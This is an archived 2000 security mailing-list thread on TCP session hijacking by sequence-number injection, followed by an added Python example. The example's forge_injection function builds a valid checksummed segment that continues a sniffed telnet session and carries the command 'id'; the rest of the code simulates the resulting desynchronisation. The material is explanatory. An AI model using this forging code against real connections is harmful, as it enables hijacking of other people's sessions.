Subject: Re: Forge packets ?
From: George Gales (george_gales@NON.AGILENT.COM)
Date: Tue Sep 12 2000 - 13:17:16 CDT


Hijacking normally involves knocking the original local user off the net one
way or another. I don't believe there's a way to hijack without causing a
disconnect without doing that.

Assuming the hijacker was able to impersonate the local user (monitor their
traffic, then inject spoofed packets with the right sequence numbers), the
original user would still get disconnected.

The cause is that, while the hijacker is sniffing the net to monitor the
local user's traffic (and adjusting its sequence numbers to make things
work), the original local user isn't sniffing, and won't adjust his sequence
numbers to take into account the hijacker's traffic.

As soon as the original local user communicates with the remote end (either
direction), the receiving end would notice the incorrect sequence numbers,
and things would go down the tubes (probably generate a RST and close the
connection).

If I'm wrong, please somebody explain...

-Simon
george_gales@non.agilent.com

-----Original Message-----
From: Samy Kamkar [CommPort5] [mailto:CommPort5@LUCIDX.COM]
Sent: Monday, September 11, 2000 4:29 PM
To: VULN-DEV@SECURITYFOCUS.COM
Subject: Re: Forge packets ?

Just sending packets (assuming there is a connection from your LAN which
you're able to sniff) with data without disconnecting connections should be
pretty simple. No handshakes needed since the connection will still be open
from the local user...the local user will see it if (s)he sniffs the LAN's
packets and the remote host may echo the data which you sent, depending on
the protocol. You would need to sniff the packets which the local user is
sending to the remote host and then you'll need to create a packet matching
what an outgoing packet from the local user would look like (correct
sequence number, window size, etc.) and send it on its way...so it is
possible. There are also many programs which already 'utilize' the
local-net/TCP insecurities. Not allowing spoofed packets out (although it
won't necessarily always be 'spoofed', could be from the same hostname
depending on how the LAN is set up) could stop it...I'm not aware of the
best way to stop this from happening, or how easy it is to not allow spoofed
packets out.

Skreel wrote:

> So TCP hijacking is the solution? I thought hunt could only hijack
> connections on port 23. What I actually want is to send data to a remote
> host without dropping the user's connection, whether the user sees the
> data or not (I'm only talking theoretically). I just wanted to know if it
> was possible. And also, if I used ipchains to IP-masquerade the LAN, then
> wouldn't it be easier for an attacker to send data and hijack the user's
> connection? Is there any way to prevent this kind of attack (if it is a
> real attack)?
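
The two mechanics discussed in this thread, the forged in-sequence segment Samy describes and the desynchronisation of the real client that George describes, as an added example that is not part of the original messages or of any tool mentioned in them. The addresses, ports and payloads are constructed; the endpoint model keeps only SND.NXT and RCV.NXT from RFC 793 and ignores windows, retransmission timers and sequence wraparound.

```python
"""TCP hijacking by sequence-number injection: forging the next segment and
the desynchronisation that follows.  Added example; addresses, ports and
payloads are constructed, and the endpoint model is a deliberate
simplification (no windows, retransmission timers or wraparound)."""
import socket
import struct

PSH, ACK = 0x08, 0x10
TCP_PROTO = 6
CLIENT_IP, SERVER_IP = "10.0.0.5", "10.0.0.9"   # constructed addresses


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum; data is zero-padded to an even length."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    return (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
            + struct.pack("!BBH", 0, TCP_PROTO, tcp_len))

def parse_tcp(segment: bytes) -> dict:
    """Split a TCP segment into header fields and payload (options are skipped)."""
    sport, dport, seq, ack, off_flags, win, csum, _urg = struct.unpack(
        "!HHIIHHHH", segment[:20])
    data_off = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x01FF, "win": win, "csum": csum,
            "payload": segment[data_off:]}

def build_tcp(src_ip, dst_ip, sport, dport, seq, ack, flags, win, payload: bytes) -> bytes:
    """Option-less TCP segment with a valid checksum over the IPv4 pseudo-header."""
    def header(csum):
        return struct.pack("!HHIIHHHH", sport, dport, seq, ack,
                           (5 << 12) | flags, win, csum, 0)
    csum = ones_complement_sum(
        pseudo_header(src_ip, dst_ip, 20 + len(payload)) + header(0) + payload)
    return header(csum) + payload

def checksum_ok(src_ip, dst_ip, segment: bytes) -> bool:
    """A correctly checksummed segment sums to zero together with its pseudo-header."""
    return ones_complement_sum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0

def forge_injection(sniffed: bytes, src_ip: str, dst_ip: str, payload: bytes) -> bytes:
    """What an on-LAN injector sends after sniffing the client's last segment:
    same 4-tuple, seq continued past the sniffed payload, the client's own ack
    and window.  Assumes the sniffed segment carried no SYN/FIN (each of which
    consumes one sequence number)."""
    p = parse_tcp(sniffed)
    next_seq = (p["seq"] + len(p["payload"])) & 0xFFFFFFFF
    return build_tcp(src_ip, dst_ip, p["sport"], p["dport"], next_seq, p["ack"],
                     PSH | ACK, p["win"], payload)


class Endpoint:
    """Only SND.NXT and RCV.NXT from RFC 793; a segment is a (seq, ack, length) tuple."""

    def __init__(self, snd_nxt: int, rcv_nxt: int):
        self.snd_nxt, self.rcv_nxt = snd_nxt, rcv_nxt

    def send(self, nbytes: int) -> tuple:
        seg = (self.snd_nxt, self.rcv_nxt, nbytes)
        self.snd_nxt += nbytes
        return seg

    def receive(self, seg: tuple) -> str:
        seq, ack, nbytes = seg
        if seq != self.rcv_nxt:          # not the byte this side is waiting for
            return "out-of-sequence: dropped, ACK %d resent" % self.rcv_nxt
        if ack > self.snd_nxt:           # RFC 793 3.9: ACK for data never sent
            return "ack-for-unsent-data: dropped, ACK resent"
        self.rcv_nxt += nbytes
        return "accepted"


def hijack_trace(isn_client: int = 1000, isn_server: int = 5000,
                 injected: int = 10, client_data: int = 5) -> list:
    """Hijacker injects as the client; the client, which saw none of it, sends next."""
    client = Endpoint(snd_nxt=isn_client, rcv_nxt=isn_server)
    server = Endpoint(snd_nxt=isn_server, rcv_nxt=isn_client)
    trace = []
    forged = (client.snd_nxt, client.rcv_nxt, injected)   # the numbers the hijacker sniffed
    trace.append(("server<-hijacker", server.receive(forged)))
    trace.append(("server<-client", server.receive(client.send(client_data))))
    trace.append(("client<-server", client.receive(server.send(0))))   # server's re-ACK
    return trace


if __name__ == "__main__":
    sniffed = build_tcp(CLIENT_IP, SERVER_IP, 40000, 23, 1000, 5000, PSH | ACK, 8192, b"ls -l\n")
    forged = parse_tcp(forge_injection(sniffed, CLIENT_IP, SERVER_IP, b"id\n"))
    print("forged seq/ack:", forged["seq"], forged["ack"])
    for hop, result in hijack_trace():
        print(hop, "->", result)
```

Running it shows the two halves of the argument: the injected bytes are accepted because they carry exactly the sequence number the server expects, the real client's next segment then reuses that number and is dropped as old data, and the server's re-ACK acknowledges bytes the client never sent, which RFC 793 says to answer with yet another ACK. That mutual re-ACKing is the ACK storm that hijacking tools have to deal with; whether a given stack eventually resets instead is implementation-dependent. The checksum covering the pseudo-header is also why a forged segment has to be rebuilt from the addresses, not just copied from the sniffed header with a new payload.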